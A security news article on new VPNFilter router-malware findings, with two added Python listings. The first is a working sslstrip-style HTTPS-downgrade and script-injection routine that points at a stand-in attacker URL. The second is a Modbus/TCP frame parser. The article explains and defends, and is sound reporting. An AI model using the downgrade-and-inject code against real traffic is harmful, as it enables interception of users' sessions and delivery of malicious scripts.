New Abilities, Targets of VPNFilter Malware Disclosed
Researchers warned Wednesday that VPNFilter, the strain of potentially destructive malware uncovered late last month, can infect more devices than previously thought. It can also intercept network traffic and deliver malicious payloads to hosts behind an infected router via a man-in-the-middle attack.
VPNFilter, the malware that was found running rampant on 500,000 hacked routers across 54 countries last month, can infect more devices than initially thought.
Researchers with Cisco's Talos divulged new details around the malware on Wednesday, including the fact that VPNFilter can also infect devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. The researchers previously disclosed that the malware was targeting routers by Linksys, MikroTik, Netgear and TP-Link, along with network attached storage devices made by QNAP.
The malware can also deliver exploits to endpoints behind an infected device via a man-in-the-middle attack. By injecting malicious content into web traffic passing through the router, an attacker could compromise not just the vulnerable device but the hosts on the network it serves, Cisco researchers said Wednesday.
The module that carries this out, dubbed "ssler" by researchers, can also downgrade HTTPS to plaintext HTTP in the traffic it intercepts (an sslstrip-style attack), so that sessions which would otherwise be encrypted pass through the router in the clear, where they can be read and modified.
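To make the downgrade concrete, the following is an added illustration written for this article, not VPNFilter's code and not Talos' code: a compact model of the sslstrip-style rewrite Talos describes (intercept the victim's outbound port-80 HTTP on the router, replace https:// with http:// in both directions, defeat compression so the HTML can be edited, rewrite redirects, and inject a "hook" script). The specific header values, the hook URL (a TEST-NET-3 address) and the sample request and responses are constructed for the demonstration and are assumptions, not captured traffic. The small WAN-side check at the end flags the distinctive Accept-Encoding value the rewrite leaves behind.

```python
"""Added illustration of an sslstrip-style rewrite (not the malware's code).

Reconstructed from the public description of ssler's technique; header
values, hook URL and sample traffic below are constructed for the demo.
"""

HOOK_URL = "http://203.0.113.10/hook.js"   # hypothetical attacker URL (TEST-NET-3 range)


def split_message(raw: bytes):
    """Split a raw HTTP message into (start line, header lines, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body


def join_message(start: bytes, headers: list, body: bytes) -> bytes:
    return b"\r\n".join([start, *headers]) + b"\r\n\r\n" + body


def rewrite_request(raw: bytes) -> bytes:
    """Victim's outbound request, as modified on the router before it reaches the server."""
    start, headers, body = split_message(raw)
    out = []
    for line in headers:
        name = line.split(b":", 1)[0].strip().lower()
        if name == b"accept-encoding":
            out.append(b"Accept-Encoding: plaintext/none")  # uncompressed reply is editable
        elif name == b"connection":
            out.append(b"Connection: close")                # one request per TCP connection
        elif name == b"upgrade-insecure-requests":
            continue                                        # drop the browser's HTTPS hint
        else:
            out.append(line)
    # Any https:// the client included (Referer, form fields) is downgraded too.
    return join_message(start, out, body).replace(b"https://", b"http://")


def rewrite_response(raw: bytes, hook_url: str = HOOK_URL) -> bytes:
    """Server response, as modified on the way back to the victim."""
    start, headers, body = split_message(raw)
    body = body.replace(b"https://", b"http://")            # keep follow-up clicks on HTTP
    hook = b'<script src="%s"></script>' % hook_url.encode()
    if b"</head>" in body:
        body = body.replace(b"</head>", hook + b"</head>", 1)  # inject attacker JavaScript
    out = []
    for line in headers:
        name, _, value = line.partition(b":")
        lname = name.strip().lower()
        if lname == b"location":                            # redirects to HTTPS become HTTP
            out.append(b"Location: " + value.strip().replace(b"https://", b"http://"))
        elif lname == b"content-length":
            continue                                        # recomputed for the edited body
        else:
            out.append(line)
    out.append(b"Content-Length: " + str(len(body)).encode())
    return join_message(start, out, body)


def looks_stripped(raw_request: bytes) -> bool:
    """WAN-side check: no real browser sends this Accept-Encoding value."""
    _, headers, _ = split_message(raw_request)
    return any(h.strip().lower() == b"accept-encoding: plaintext/none" for h in headers)


# Constructed sample traffic for the demonstration (not a real capture).
REQUEST = (b"GET /login HTTP/1.1\r\n"
           b"Host: bank.example\r\n"
           b"Connection: keep-alive\r\n"
           b"Upgrade-Insecure-Requests: 1\r\n"
           b"Accept-Encoding: gzip, deflate\r\n"
           b"Referer: https://bank.example/\r\n\r\n")
PAGE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 101\r\n\r\n"
        b"<html><head><title>Login</title></head>"
        b'<body><a href="https://bank.example/pay">Pay</a></body></html>')
REDIRECT = b"HTTP/1.1 302 Found\r\nLocation: https://bank.example/login\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    print(rewrite_request(REQUEST).decode())
    print(rewrite_response(PAGE).decode())
    print(rewrite_response(REDIRECT).decode())
```

The point to take from the model is that the router never has to break TLS: it only needs the victim to make one plaintext HTTP request, and from then on it keeps every link and redirect on HTTP while the victim sees pages that look normal. A browser that already holds an HSTS entry for the site refuses to send that first plaintext request, which is why the downgrade works best against sites without HSTS.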
Perhaps more troubling, another new module, dstr, can render devices inoperable by deleting the files they need to run.
"The dstr modules are used to render an infected device inoperable by deleting files necessary for normal operation. It deletes all files and folders related to its own operation first before deleting the rest of the files on the system, possibly in an attempt to hide its presence during a forensic analysis," Cisco researchers wrote Wednesday.
Researchers with the firm said last month that the malware had a "kill" command that could be used to essentially brick devices. The new dstr (device destruction) module, which Talos classes as a stage 3 module, gives any stage 2 module that lacks the "kill" command the ability to disable the device.
Cisco also said last month that the malware had two other modules: a packet sniffer that watches network traffic and looks in particular for Modbus TCP/IP packets, and a module that communicates with command and control servers over the Tor network.
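Talos' write-up says the sniffer watches for Modbus TCP/IP traffic. As an added example written for this article (not the malware's code and not Talos' code), the following parses Modbus/TCP frames the way a passive sniffer would classify them and pulls out the write operations, the ones that change the state of a PLC. The function-code table is the standard Modbus one; the packets in SAMPLE_PACKETS are constructed by hand, including one malformed frame and one non-Modbus packet that the parser must skip.

```python
"""Added example: classify Modbus/TCP frames as a passive sniffer would.

Illustrative code written for this article, not the VPNFilter sniffer.
The packets below are constructed by hand.
"""
import struct
from dataclasses import dataclass
from typing import Optional

MODBUS_TCP_PORT = 502
FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
}
WRITE_CODES = {5, 6, 15, 16}   # codes that change PLC state


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes

    @property
    def name(self) -> str:
        base = self.function_code & 0x7F
        label = FUNCTION_NAMES.get(base, "function %d" % base)
        return "exception to " + label if self.function_code & 0x80 else label

    @property
    def is_write(self) -> bool:
        return self.function_code in WRITE_CODES


def parse_modbus_tcp(payload: bytes) -> Optional[ModbusFrame]:
    """Return a frame if payload is a well-formed Modbus/TCP ADU, else None.

    MBAP header: transaction id (2), protocol id (2, always 0), length (2),
    unit id (1); the PDU that follows starts with the function code.
    """
    if len(payload) < 8:
        return None
    tid, proto, length, unit, fc = struct.unpack(">HHHBB", payload[:8])
    if proto != 0 or length != len(payload) - 6:   # length counts unit id + PDU
        return None
    return ModbusFrame(tid, unit, fc, payload[8:])


def scan(packets):
    """packets: iterable of (src_port, dst_port, payload).
    Returns (direction, frame) tuples for the Modbus frames found."""
    found = []
    for sport, dport, payload in packets:
        if MODBUS_TCP_PORT not in (sport, dport):
            continue                                   # not Modbus/TCP at all
        frame = parse_modbus_tcp(payload)
        if frame is None:
            continue                                   # port 502 but not a valid ADU
        found.append(("request" if dport == MODBUS_TCP_PORT else "response", frame))
    return found


def write_summary(packets):
    """One line per write request: which unit, which operation, which start address."""
    out = []
    for direction, frame in scan(packets):
        if direction == "request" and frame.is_write and len(frame.data) >= 2:
            addr = struct.unpack(">H", frame.data[:2])[0]
            out.append("unit %d: %s at 0x%04x" % (frame.unit_id, frame.name, addr))
    return out


# Constructed sample capture: read request/response, two writes, a malformed
# frame (declared length does not match) and an unrelated HTTP request.
SAMPLE_PACKETS = [
    (50001, 502, bytes.fromhex("000100000006" "0103" "0000000a")),          # read 10 regs
    (502, 50001, bytes.fromhex("000100000017" "010314" + "00" * 20)),       # 20-byte reply
    (50001, 502, bytes.fromhex("000200000006" "0106" "00101234")),          # write reg 0x10
    (50001, 502, bytes.fromhex("00030000000b" "0110" "0000000204" "00010002")),  # write 2 regs
    (50003, 502, bytes.fromhex("000400000009" "0103")),                     # bad length
    (50002, 80, b"GET / HTTP/1.1\r\n\r\n"),                                 # not Modbus
]

if __name__ == "__main__":
    for direction, frame in scan(SAMPLE_PACKETS):
        print(direction, frame.unit_id, frame.name, frame.data.hex())
    print(write_summary(SAMPLE_PACKETS))
```

Checking the declared length against the bytes actually present is what keeps a sniffer from mis-labelling arbitrary port-502 traffic as Modbus; the same check is also where a parser that trusts the length field rather than the buffer would read past the packet.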
The FBI and DOJ blunted the campaign late last month by seizing control of a server used by the botnet's command and control infrastructure, but the threat has not gone away.
Following the disruption, the FBI urged users to reboot their routers, but a reboot alone does not rid a device of VPNFilter. Rebooting removes the stage 2 and stage 3 modules, but the stage 1 component persists across reboots and can be used to reinstall them. To truly eradicate the malware, users need to perform a factory reset, usually via a button on the back of the device, which wipes the malware's custom settings, and then set a new administrative password, since a reset restores the default credentials.
Talos researchers warn that the latest revelations, especially the malware's ability to inject malicious content into web traffic, are concerning.
If an attacker was able to infect a network they could "deploy any desired additional capability into the environment to support their goals, including rootkits, exfiltration capability and destructive malware," William Largent, a threat researcher with Talos, warned.